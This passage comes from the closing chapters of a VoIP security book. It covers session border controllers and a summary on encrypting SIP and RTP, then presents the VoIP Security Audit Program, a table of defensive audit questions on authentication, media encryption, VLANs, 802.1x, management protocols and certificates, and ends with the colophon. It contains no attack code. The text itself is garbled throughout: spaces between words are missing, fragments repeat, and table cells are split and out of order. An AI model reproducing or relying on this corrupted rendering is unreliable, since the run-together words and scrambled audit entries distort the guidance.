mediaports,manyorganizationsandvendorschooseastaticportortwobasedontheiruniquedeployment.AnothermethodofmakingorganizationshappierwithVoIPistheuseofSessionBorderControllers(SBCs).SBCsaredevicesusedtomanagesignaling(SIPandH.323)andmediacommunication(RTP)betweenendpoints,withNATfunctionality.ThedevicesusuallysitoutsidethefirewallintheDMZorexternalnetworksotheycansetup,communicate,andteardowncallsonbehalfofendpoints.SBCsusuallyspeaktoagatekeeper(H.323)orProxyserver(SIP)insidethefirewallontheinternalnetwork.Inmostsituations,afirewallruleiscreatedallowingthesetwoentitiestotalktoeachother,butnothingelse.Hence,onlyoneruleiscreatedinthefirewall,andallendpointsspeaktotheinternalH.323gatekeeperorSIPProxyserver.TheinternalH.323gatekeeperorSIPProxyserverisallowedtotalktotheSBC,whichgoesoutandmakestheconnectionwiththeremoteendpointontheuser'sbehalf.Similarly,thereversecommunicationrunsthroughtheexternalSBC,whichisthenallowedtotalkonlytotheinternalH.323gatekeeperorSIPProxyserver.TheinternalH.323gatekeeperorSIPProxyserverthenpassesthepacketstothecorrectendpoint.Figure9-6showsanexampleofthearchitecture.

SummarySecuringVoIPnetworksisnotaneasytask,butitisanimportantone.Whiletheprocesscanbecumbersome,deployingSIPS,SRTP,orZRTPcandrasticallyreducetheattacksurfaceonaVoIPnetwork.Theabilitytoprovideencryptionatboththesessionlayerandmedialayercanensurethatusersarereceivingthesamelevelofsecurityas,ifnotmorethan,theywouldhaveifusingtraditionalphonesystems.Furthermore,sensitiveaudiocommunication,frominternalcallsregardingstockinformationtoprivacyconcernsaboutpersonaldata,mightbemandatedtobeassecureasanyotherentity(e.g.,filesandfolders)onthenetworkholdingthesametypeofinformation.Finally,softphonesusingSRTPcandeploynewtechnologiessuchasZfone,allowingusersadditionalsecurityonsoftphonesthatmightnotprovideitnatively.

Figure9-6.SBCwithVoIPinfrastructure

TLSisabasicrequirementforwebcommunication;however,italsohashadmorethan10yearsofinfrastructurebuiltintoit.Forexample,arootchaintreethatisbuiltintoInternet

Forexample,arootchaintreethatisbuiltintoInternetExplorerandFirefoxmakesitveryeasytobuildapublicnetworkusingTLS.Unfortunately,hardphonesdonothavethatsameluxury.Furthermore,SRTPandZRTPsolvemanyissues,butthelackofsupportandinteroperabilitybetweenvendorsstillkeepsitfrombeinganeasyplug-and-playdeployment.Also,firewallsthatusuallyhelpwithnetworkprotocolsactuallyaddtotheissue,astheirsupportforVoIPprotocolsismarginalatbest.ThebumpyroadthatissecuringVoIPneedstobecompleted.Anyorganizationthatiswillingtoaccepttherisksmightaswellsharetheirvoicemailpasswordswitheveryemployeeofthecompany.Thenagain,avoicemailpasswordisprobablynothingwhencomparedwiththecreditcardnumbers,personalhealthinformation,orsocialsecuritynumbersthatarecontinuallybeingtransmittedonvoicecalls.Securedesigns,theuseofencryptionatthesessionlayerandmedialayer,andintegrityprotectionmustbestaplesofVoIPifitdoesnotwanttobetheweakestlinkintheITnetwork.Furthermore,integrityandconfidentialityhavetraditionallybeenassumedinvoicecommunication,andtheyshouldhavethatsamestatusinVoIPdevicesaswell.

Chapter10.AUDITINGVOIPFORSECURITYBESTPRACTICESAuditingVoIPnetworksisanimportantstepinsecuringthem.InmostVoIPnetworks,therearemanymovingpartsthatmayhaveanegativeeffectonsecurity.Forexample,theuseofstrongsessionsecuritymaybenegatedbypoormediasecurity.Furthermore,encryptedmediacommunicationmaybeinvalidatedifsessionsetupprotocolssendtheencryptionkeyincleartext.EachaspectofVoIP,includingthenetwork,devices,software,andprotocols,shouldbeanalyzedintermsofsecurity.Apoorsecuritysettingononeentitycanaffectthestrongsecurityofothers.AuditingVoIPnetworks,identifyingsecuritygaps,andthenimplementingsolutionsthatmitigateexposedriskisoftenthebestapproach.AuditingVoIPnetworksforsecurityisagoodfirststepinunderstandingtheriskofthenetworkinfrastructureanditscomponents.Ifgapsarenotidentifiedinagivennetwork,remedyingissues,trackingprogress,andmovingtowardastrongsecuritymodelforvoicecommunicationwillbeverydifficult.ThischapterwillfocusonauditingVoIPnetworksforpropersecuritysettingsandcontrols.Additionally,thebestpracticesforsecuringVoIPentitieswillbediscussed.

VoIPSecurityAuditProgramVoIPSecurityAuditProgram(VSAP)version1.0isamethodologycreatedbytheauthorinordertobegintheprocessofdevelopingaclearstandardformeasuringVoIPsecuritysothatorganizationscanunderstandhowstrongtheirVoIPnetworksare.Furthermore,thestandardwillcreateabaselinetostartmeasuringVoIP.TheauthorwillcontinuetoupdateVSAPevenafterthebook'spublication.Additionally,aninteractiveversionofVSAPcanbedownloadedfromhttp://www.isecpartners.com/tools.html/.Afterauseranswers

thequestionsintheinteractiveversionofVSAP,itwilldisplaytheresultswithanoverallriskscorefortheVoIPnetwork.VSAPisorganizedlikeatypicalauditprogram,usingaquestion-and-answerformatwithdifferentlevelsofmeasurement,includingSatisfactory,Unsatisfactory,andMixed.ThefollowingtableshowsthecontentsofVSAP.Table10-1.VoIPAuditProgram

AuditTopic AuditQuestions AuditResults

SIPauthentication

SIPS,orSIPwrappedinaTLStunnel,shouldbeusedforsessionlayerprotectionwhenusingSIP.

HowissessionsetupauthenticationusedwithSIP?

Satisfactory:SIPwithSSL/TLSUnsatisfactory:StandardSIPdigestauthentication

SIPregister

SIPUserAgentshouldauthenticateREGISTERandINVITErequests.

AreSIPREGISTERandINVITErequestsauthenticated?

Satisfactory:SIPREGISTERandINVITErequestsareauthenticated.Unsatisfactory:SIPREGISTERandINVITErequestsarenotauthenticated.

H.225authentication

H.225wrappedinaTLStunnelshouldbeusedforsessionlayerprotectionsusingH.323.

HowissessionsetupauthenticationusedwithH.323?

Satisfactory:H.323withSSL/TLSUnsatisfactory:StandardH.323authenticationwiththeMD5hashofatimestampandpassword

H.225MD5authenticationtime

Tolimitreplayattacks,lowNTP

AretimestampsfromNTPserversthatareusedwith

Satisfactory:Timestampsaresetto15minutesor

Tolimitreplayattacks,lowNTPthresholdsshouldbeusedwithH.225MD5authentication.

usedwithH.225authenticationsetto15minutesorless?

aresetto15minutesorless.Unsatisfactory:Timestampsaresetto15minutesormore.

IAXauthentication

IAXwrappedinaTLStunnelshouldbeusedforsessionlayerprotectionwhenusingIAX.

HowissessionsetupauthenticationusedwithIAX?

Satisfactory:IAXwithSSL/TLSUnsatisfactory:StandardIAXauthenticationwiththeMD5hashofthepassword

ConcurrentSIP/IAX/H.323sessions

Donotallowconcurrentsessionswithasingleusernameandpassword(onesessionperaccount).

IsasingleusernameandpasswordallowedtoauthenticatemultipletimesfrommultipleendpointsorUserAgents?

Satisfactory:Asingleusernameandpasswordislimitedtoonlyonesuccessfulauthentication.Unsatisfactory:Asingleusernameandpasswordcanbeauthenticatedmanytimes.

Sessionlayerunregistration

Sessionprotocols,suchasSIP,H.323,andIAX,shouldrequireauthenticationtoun-registeranendpointorUserAgent.

IsauthenticationrequiredtounregisterSIP/H.323/IAXclients?

Satisfactory:AuthenticationisrequiredtounregisteranendpointorUserAgent.Unsatisfactory:Noauthenticationisrequired,butratherasimpleUNREGISTERpacketfromthenetworkdisconnectsclients.

LDAPoverSSL

IsLDAPoverSSLusedwith

Satisfactory:LDAPoverSSLisusedfortheVoIPendpointsorUserAgentsusingLDAP

IfH.323endpointsorSIPUserAgentsuseanLDAPstoreforauthentication,ensurethatLDAPoverSSLisenabledtoprotectauthenticationcredentials.

SSLusedwithendpointsorUserAgentswhoareauthenticatingtoanLDAPstore?

AgentsusingLDAPstores.Unsatisfactory:

LDAPoverSSLisnotusedfortheVoIPendpointsorUserAgentsusingLDAPstores.

Mediaencryption

Voicecommunicationshouldbeencryptedifitcontainsprivate,sensitive,orconfidentialinformation.

Voicecommunicationmustensureanadequatelevelofprivacy.Isthemedialayerencrypted?

Satisfactory:SRTP,AES,oranIPSectunnelisusedforallmediacommunication.Unsatisfactory:Noencryptionisusedonthemedialayer.

SRTPkeyexchange

WhenSRTPisused,thekeyexchangeshouldnottraversethenetworkincleartext.Hence,TLSshouldbeusedatalltimeswithSIPorH.323whenSRTPisenabled(otherwise,anysecurityenabledwithSRTPisnegated).

WhenSRTPisused,isTLSalsousedwiththesessionsetupprotocol,suchasSIPorH.323,toensurethatthekeyexchangedoesnottraversethenetworkincleartext?

Satisfactory:TLSisusedwithSIP/H.323incombinationwithSRTP.Unsatisfactory:TLShasnotbeenimplementedonSIP/H.323incombinationwithSRTP.

RTPentropy

RTPpacketsneedtocontainanadequatelevelofentropytohelppreventRTPinjectionattacks.Ensurethatthefull64-bitsoftheSSRC,sequencenumber,andtimestampuserandomvaluesratherthansequentialvalues.

HowisRTPentropyimplemented?

Satisfactory:TheRTPmediasessionusestrulyrandomvaluestopreventattackersfromeasilyguessingvalues.Unsatisfactory:Thetimestampstartswith0andincrementsbythelengthofthecodeccontent(160),thesequencestartswith0

sequencestartswith0andincrementsby1,andtheSSRCisafunctionoftime.

IAXmediacommunication

Voicecommunicationshouldbeencryptedifitcontainsprivate,sensitive,orconfidentialinformation.

Voicecommunicationmustensureanadequatelevelofprivacy.Isthemedialayerencrypted?

Satisfactory:SRTP,AES,oranIPSectunnelisusedforallmediacommunication.Unsatisfactory:Noencryptionisusedonthemedialayer.

E.164aliases

E.164aliasesshouldbeuniqueanddifficulttospooforenumerate.

AredefaultE.164aliasesused?

Satisfactory:UniqueandcustomizedE.164aliaseshavebeenenabled.Unsatisfactory:TherehasbeennochangetoE.164aliases.

DuplicateE.164aliashandling

Agatekeeper'sregistrationconflictpolicyshouldbesettoReject,whichwillpreventspoofedE.164aliasesfromoverwritinglegitimateendpoints.Itshouldbenotedthatwiththissetting,anattackercanperformaDenialofServiceattackonalegitimateendpoint,registerwiththegatekeeper,andpreventthelegitimateendpointfromregisteringwhenitcomesbackonline(becauseoftheRejectpolicy).EnsurethatDoSattacksonendpointsaremitigatedbeforesettingthepolicy.

Whatistheregistrationrejectpolicysetto?

Satisfactory:RegistrationrejectUnsatisfactory:Overwrite

Authentication/authorization

Satisfactory:AgivenusernameandpasswordcanbeusedwithonlyonespecificE.164alias.

AcompromisedE.164aliasshouldbeuselesswithoutthecorrespondingauthenticationinformation.

AreE.164aliasestiedtoasingleusernameandpassword?

onespecificE.164alias.Unsatisfactory:E.164aliasandH.323authenticationarenottiedtogether.Hence,agivenusernameandpasswordcanbeusedonanyauthorizedE.164alias.

E.164duplicateerrors

VagueerrormessagesforduplicateE.164aliasesshouldbeused.

WhenattemptingtoregisteranH.323endpointwithaduplicatealias,istheerrorduplicateAlias(4)senttotheuser(onthewire)oramoregenericerrormessage,suchassecurityDenial?

Satisfactory:Ageneric(securityDenial)errormessageissent(onthewire)whentwoendpointsregisterwiththesamealias.Unsatisfactory:duplicateAlias(4)isstillusedwhentwoendpointsattempttoregisterwiththesamealias.

802.1x

802.1x-compliantdevices,includingendpointsandUserAgents,shouldbeusedonVoIPnetworks.

Is802.1xsupportedonVoIPnetworks?

Satisfactory:802.1xisstrictlyusedonVoIPsubnetsandVLANs.Unsatisfactory:802.1xisnotusedonVoIPsubnetsandVLANs.

VLANusage

VLANsaregoodforsegmentationbutshouldnotbeusedasasecuritycontrolbecauseanattackercansimplyunplugaVoIPhardphonefromtheclosestEthernetjackandplugintotheVoIPnetworkwithhisorherPC.802.1xcanbeusedtoensurethatunauthorizedsystemsarenotconnectedtotheVoIPVLAN.

IstheVoIPVLANusing802.1x?

Satisfactory:TheVoIPVLANisusing802.1x.Unsatisfactory:TheVoIPVLANisnotusing802.1x.

VLAN.

ARPmonitoring

EnableARPmonitoringonallvideoconferencenetworkstodetectARPpollution/poisoningattacks.

IsARPmonitoringoccurringonVoIPsubnets/VLAN?

Satisfactory:ARPmonitoringisoccurringonallVoIPsubnets/LAN,specificallyforman-in-the-middleattacks.Unsatisfactory:NoARPmonitoringprocessesarecurrentlybeingused.

Networksegmentation

Whilenotasecuritycontrol,VoIPnetworksshouldbeseparatedfromdatanetworks.

AreVoIPnetworksonthesameVLANs/subnetsasdatanetworks?

Satisfactory:VoIPnetworksontheirownVLANs.Unsatisfactory:VoIPnetworkssharethesamenetworkasthedatanetwork.

In-band/out-of-bandmanagement

ManagementmethodsforVoIPdevicesshouldbeout-of-bandandmanagedfromasecureandtrustedmanagementnetwork.VoIPdevicesshouldnotbemanagedfromin-banddataconnections.

AreVoIPdevicesmanagedout-of-bandviaanisolatedmanagementnetwork?

Satisfactory:Out-of-banddevicemanagementviaamanagementnetworkorEncryptedin-banddevicemanagementviaamanagementnetworkUnsatisfactory:Out-of-bandmanagementviaanopeninternalnetworkorCleartextdevicemanagementoverin-bandnetworks

VoIPmanagementfiltering

VoIPdevicemanagementshouldbe

AreaccessfiltersplacedonVoIPdevices,filteringaccesstoonly

Satisfactory:Accessfiltersareused.

VoIPdevicemanagementshouldbelimitedtoauthorizedmachinesusingIPaddressandhostnamefilters.

toonlymanagementandauthorizednodes(viaIPaddressfiltersorhostnamefilters)?

filtersareused.Unsatisfactory:Access

filtersarenotused.

VoIPmanagementprotocols

Passwordauthenticationformanagementpurposesshoulduseencryptedprotocols.

Whatprotocolsarebeingusedformanagementandadministration?

Satisfactory:SSH,SSL(HTTPS),and/orSNMPv3Unsatisfactory:telnet,HTTP,and/orSNMPv1

SNMP

TheuseofSNMPv1isstronglydiscouraged.Ifitisabusinessrequirement,usedifficult-to-guesscommunitystringsandrestrictaccessviaafirewallorrouteraccesscontrollists.

IsSNMPv3usedorisSNMPv1usedviaasecurenetwork?

Satisfactory:SNMPv3isusedorSNMPv1isusedinanisolatedmanagementnetwork.Unsatisfactory:SNMPv1isusedviaaninternalnetwork.

Timestamp/date

Dateandtimestampinformationshouldbecurrentinordertoensuretheintegrityofalllogfiles.

AredateandtimestampinformationcorrectonallVoIPentities?

Satisfactory:Dateandtimearecorrect.Unsatisfactory:Dateandtimearenotcorrect.

Logging

AllVoIPdevicesshouldlogimportantactivitytothemanagementsoftware.Logsshouldbereviewedregularly.

Arecritical,informational,andseverelogsstored?

Satisfactory:Logsarestoredandreviewedonaregularbasis.Unsatisfactory:Logsarenotstoredorreviewedonaregularbasis.

HardphonePINs

PINsforhardphonesshouldbeuniqueandconsistofmorethanfourcharacters.

DoallVoIPhardphonescontainuniquePINvaluesthatconsistoffourtoeightcharacters?

Satisfactory:StrongPINsgreaterthanfourcharactersareinuse.Unsatisfactory:ShortPINs,whichareusuallythelastfourdigitsoftheuser'sphoneextension,areinuse.

Hardphonebootprocess

HardphonesshoulduseHTTPSforbootfilesoverthenetwork.

WhatprotocolsarebeingusedtotransferbootimagesfromthenetworktoVoIPhardphones?

Satisfactory:HTTPSisinuseforbootfiletransfer.Unsatisfactory:TFTPorHTTPisinuseforbootfiletransfer.

Tollfraudandabuse

OnVoIPdevices,enableserver-sidecontrolsthathelppreventtheabuseofthephonesystem.Forexample,createexplicitpermissionsonwhocanmakecallsoutbound,joinconferences,andmakeinternationaloutboundcalls.

Areserver-sidecontrolsenabledforallVoIPendpointsandUserAgents?

Satisfactory:Server-sidecontrolsforVoIPendpointsandUserAgentsaresettolimitorcontroltollfraudandabuse.Unsatisfactory:Noserver-sidecontrolsarebeingused.

AutoDiscovery

Gatekeepers,BorderControllers,andendpointsshouldhavestaticIPaddresseslistedonthem.

AreallAutoDiscoveryvaluessettooff(asamaliciousattackercanupdatethegatekeeperinformation)?

Satisfactory:AllexternalgatekeepershaveAutoDiscoveryoff.Unsatisfactory:ExternalgatekeepershaveAutoDiscoveryon.

SSLcertificates

Satisfactory:Non–self-

DevicesusingSSLforauthenticationormediacommunicationshouldusestrongSSLcertificates.

WhattypesofSSL/TLScertificatesarebeingused?

Satisfactory:Non–self-signedSSLv3/TLSv1withstrongciphersuitesonlyUnsatisfactory:Self-signedSSLcertificateswithSSLv2orbelowwitheitherlow,medium,orhighciphersuites

SSLcertificateschecking

Incorrect,CNamemismatch,orexampleSSLcertificatestoandfromVoIPdevicesareautomaticallydisabled.

WhatisthebehaviorofVoIPdeviceswhenanincorrect,mismatched,expired,orself-signedSSLcertificateisidentifiedduringsessionormediaconnection?

Satisfactory:Connectionisimmediatelydropped.Unsatisfactory:Userispromptedforactionbasedonhisorherjudgment.

DHCP/DNSservers

SupportingVoIPinfrastructureservices,suchasDHCPandDNS,shouldusededicatedresourcesthatarenotsharedwithuseranddatanetworks.

ArededicatedDNSandDHCPserversusedforVoIPnetworks?

Satisfactory:VoIPnetworkscontainadedicatedDHCPandDNSserver.Unsatisfactory:VoIPnetworksshareDHCP/DNSwithdataandusernetworks.

SummaryVoIPnetworksareacollectionofsoftware,hardware,infrastructureservices,andprotocols.Thischapterdiscussedanewstandardauditprogram(VSAP)forconsistentlymeasuringVoIPintermsofsecurity.TheauditprogramshowshowtoauditVoIPentitiesforstandardsecuritypractices.AuditingVoIPnetworksanddevicesisthebestmethodofidentifyingthegapsinaVoIPnetwork,intermsofavailabilityandsecurity,andwillallowenduserstobegintheprocessofmitigatinganyidentifiedsecuritygaps.Additionally,compliancebodiescanuseVSAPtodemonstratethestrengthsandweaknessesofaparticularentity.AuditingVoIPnetworkswillhelpVoIPadministratorsandsecurityarchitectsmeasuresecurity.Itwillinformallinterestedbodiesthatappropriatecontrolsareinplaceorthatthereisanactionplantoputtheminplace.

COLOPHONThefontsusedinHackingVoIPareNewBaskerville,Futura,andDogma.ThebookwasprintedandboundatMalloyIncorporatedinAnnArbor,Michigan.ThepaperisGlatfelterSpringForge60#SmoothAntique,whichiscertifiedbytheSustainableForestryInitiative(SFI).ThebookusesaRepKoverbinding,whichallowsittolayflatwhenopen.